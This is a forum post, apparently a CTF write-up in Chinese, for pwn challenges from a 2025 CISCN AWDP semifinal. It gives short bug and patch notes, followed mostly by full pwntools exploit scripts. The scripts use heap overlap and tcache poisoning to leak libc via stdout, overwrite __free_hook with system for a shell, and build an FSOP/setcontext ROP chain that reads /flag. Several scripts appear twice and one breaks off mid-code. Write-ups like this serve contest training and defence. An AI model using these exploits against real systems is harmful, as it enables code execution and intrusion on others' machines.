-
-
[原创]CCB_CISCN_半决赛-AWDP-Pwn
-
发表于: 2025-3-18 18:24
-
第十八届全国大学生信息安全竞赛(创新实践能力赛)暨第二届“长城杯”铁人三项赛(防护赛)半决赛 AWDP-pwn题题解
没有show, 构造堆块 ub 和 tcache fd重叠, 后面1/16 概率,申请到 _IO_2_1_stdout_-0x10
成功的情况下
最终脚本
错误的传参,存在格式字符串漏洞 ,这里也会导致堆溢出
把原本的 snprintf 函数 nop 掉即可
protobuf,堆溢出漏洞
堆块大小改大
free 后,指针还是存在的 应该存在UAF 漏洞
clear() 后 仍然可以对堆块操作,修改链表即可 任意地址申请
把 申请的堆块大小固定成一个 大的size
不看
idx 改小
from pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = '10.10.1.113 28142'.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libcelf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x001698brva 0x01754 #continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))def add(idx,size): ru('>> ') sl('1') ru(':') sl(str(idx)) ru(': ') sl(str(size))def rm(idx): ru('>> ') sl('2') ru(':') sl(str(idx))def edit(idx,size,text): ru('>> ') sl('3') ru(':') sl(str(idx)) ru(': ') sl(str(size)) ru(': ') s(text)for i in range(100): io = start([]) add(0,0x80) add(1,0xF0) add(2,0xF0) add(3,0xF0) add(4,0xF0) add(5,0xF0) add(6,0xe0) add(7,0xe0) ru('>> ') sl('3') ru(':') sl('0') ru(': ') pay = b'A'* 0x90 pay += p64(0xFFFF) s(pay) ru(': ') s('TEST') pay = b'\x00' * 0xF0 pay += p64(0x100*4+0xF1) edit(1,0x200,pay) rm(4) rm(3) rm(2) stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF lss('stdout') add(2,0x70) add(3,0x70) try: pay = b'\x00' * 0x1f8 pay += p16(stdout + 0x2000) edit(1,len(pay), pay) add(8,0xF0) add(9,0xF0) pay = p64(0) pay += p64(0xFBAD1800) + p64(0) * 3 + p8(0) edit(9,len(pay), pay) io.recvuntil('\x00'*8) libc_base = uu64(r(8)) - 2017664 libc.address = libc_base free_hook = libc.sym['__free_hook'] lss('libc_base') pause() rm(7) rm(6) pay = 0x4f8 * b'\x00' + p64(free_hook - 0x10) edit(1,len(pay), pay) add(6,0xe0) add(7,0xe0) edit(7,0x40,p64(0)+p64(libc.sym['system'])) pay = 0xF8 * '/' + '/bin/sh\x00' edit(1,len(pay), pay) rm(2) #gdb.attach(io,gdbscript=gdbscript) io.interactive() except: io.close() passitr()from pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = '10.10.1.113 28142'.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libcelf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x001698brva 0x01754 #continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))def add(idx,size): ru('>> ') sl('1') ru(':') sl(str(idx)) ru(': ') sl(str(size))def rm(idx): ru('>> ') sl('2') ru(':') sl(str(idx))def edit(idx,size,text): ru('>> ') sl('3') ru(':') sl(str(idx)) ru(': ') sl(str(size)) ru(': ') s(text)for i in range(100): io = start([]) add(0,0x80) add(1,0xF0) add(2,0xF0) add(3,0xF0) add(4,0xF0) add(5,0xF0) add(6,0xe0) add(7,0xe0) ru('>> ') sl('3') ru(':') sl('0') ru(': ') pay = b'A'* 0x90 pay += p64(0xFFFF) s(pay) ru(': ') s('TEST') pay = b'\x00' * 0xF0 pay += p64(0x100*4+0xF1) edit(1,0x200,pay) rm(4) rm(3) rm(2) stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF lss('stdout') add(2,0x70) add(3,0x70) try: pay = b'\x00' * 0x1f8 pay += p16(stdout + 0x2000) edit(1,len(pay), pay) add(8,0xF0) add(9,0xF0) pay = p64(0) pay += p64(0xFBAD1800) + p64(0) * 3 + p8(0) edit(9,len(pay), pay) io.recvuntil('\x00'*8) libc_base = uu64(r(8)) - 2017664 libc.address = libc_base free_hook = libc.sym['__free_hook'] lss('libc_base') pause() rm(7) rm(6) pay = 0x4f8 * b'\x00' + p64(free_hook - 0x10) edit(1,len(pay), pay) add(6,0xe0) add(7,0xe0) edit(7,0x40,p64(0)+p64(libc.sym['system'])) pay = 0xF8 * '/' + '/bin/sh\x00' edit(1,len(pay), pay) rm(2) #gdb.attach(io,gdbscript=gdbscript) io.interactive() except: io.close() passitr()syntax = "proto3";package mypackage;message pwn2 { int32 option = 1; int32 chunk_sizes = 2; int32 heap_chunks_id = 3; bytes heap_content = 4;}// protoc --python_out=. pwn2.protosyntax = "proto3";package mypackage;message pwn2 { int32 option = 1; int32 chunk_sizes = 2; int32 heap_chunks_id = 3; bytes heap_content = 4;}// protoc --python_out=. pwn2.protofrom pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = ''.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libc#elf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x1DECbrva 0x01BD6#continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))io = start([])import pwn2_pb2# syntax = "proto3";# package mypackage;# message pwn2 {# int32 option = 1;# int32 chunk_sizes = 2;# int32 heap_chunks_id = 3;# bytes heap_content = 4;# }def add(size,text=b'123',idx=0): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 1; data.chunk_sizes = size data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)def rm(idx,size=0,text=b'123'): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 2; data.chunk_sizes = size data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)def edit(idx,size=0,text=b'123'): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 3; data.chunk_sizes = size data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)def show(idx,size=0,text=b'123'): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 4; data.chunk_sizes = 1 data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)# 这里的堆块基本都是连续在一起的,后续溢出就方便很多add(0x100, b'1')add(0x100, b'2')add(0x100, b'3')add(0x100, b'4')add(0x100, b'5')add(0x100, b'6')add(0x100, b'7')add(0x100, b'8')pay = b'A' * 0x108 + p64(0x110 * 4 +1)edit(1,len(pay),pay)rm(2)add(0x100, b'8')show(3)ru(': ')libc_base = uu64(r(6)) - 2169632libc.address = libc_baselss('libc_base')add(0x100, b'8')rm(8)show(3)ru(': ')key = uu64(r(5))heap_base = key << 0xCrm(2)pay = b'A' * 0x108 + p64(0x111)pay += p64(key ^ libc.sym['_IO_2_1_stdout_'])edit(1,len(pay),pay)add(0x100, b'7')# 模板orw 嗦fake_IO_addr = libc.sym['_IO_2_1_stdout_']pay = flat({ 0x00: ' sh;', 0x18: libc.sym['setcontext'] + 61, 0x20: fake_IO_addr, # 0x20 > 0x18 0x68: fake_IO_addr, # rdi #read fd 0x70: 0, # rsi #read buf 0x78: fake_IO_addr, # rsi2 #read buf 0x88: fake_IO_addr + 0x8, # rdx #read size 0x90: 0x400, # rdx2 #read size 0x98: 0x23, # rdx #read size 0xa0: fake_IO_addr, 0xa8: libc.sym['setcontext'] + 294, # RCE2 ogg 0xb0: libc.sym['read'], # RCE2 ogg 0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20, 0xe0: fake_IO_addr, },filler=b'\x00')gdb.attach(io,gdbscript)add(0x100, pay)pause()libc.address = libc_baselibc_rop = ROP(libc)rax = libc_rop.find_gadget(['pop rax','ret'])[0]rdi = libc_rop.find_gadget(['pop rdi','ret'])[0]rsi = libc_rop.find_gadget(['pop rsi','ret'])[0]m = 0try: rdx = libc_rop.find_gadget(['pop rdx','ret'])[0];m = 1except: rdx = libc_rop.find_gadget(['pop rdx','pop rbx','ret'])[0]; m = 2syscall = libc_rop.find_gadget(['syscall','ret'])[0]orw_rop_addr = fake_IO_addr # ret to addrbuf = orw_rop_addr + 0xa0 + m*3*8orw_rop = p64(rax) + p64(2) + p64(rdi) + p64(buf) + p64(rsi) + p64(0) + p64(rdx) + p64(0)*m + p64(syscall)orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['read'])orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['write'])orw_rop += b'/flag'.ljust(0x10,b'\x00')sl(orw_rop)lss('libc_base')lss('key')lss('heap_base')#pay = flat({#},filler=b'\x00')# libc.address = libc_base# system = libc.sym['system']# bin_sh = next(libc.search(b'/bin/sh'))itr()from pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = ''.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libc#elf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x1DECbrva 0x01BD6#continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))io = start([])import pwn2_pb2# syntax = "proto3";# package mypackage;# message pwn2 {# int32 option = 1;# int32 chunk_sizes = 2;# int32 heap_chunks_id = 3;# bytes heap_content = 4;# }def add(size,text=b'123',idx=0): ru('Your prompt >> ')[培训]Windows内核深度攻防:从Hook技术到Rootkit实战!
|
|
|---|---|
|
|
师傅为什么php-maser哪个fix是把堆块改为固定大小的0x200呢?为什么不是clear之后把指针置空呢?这和zend的堆管理机制有关吗
|
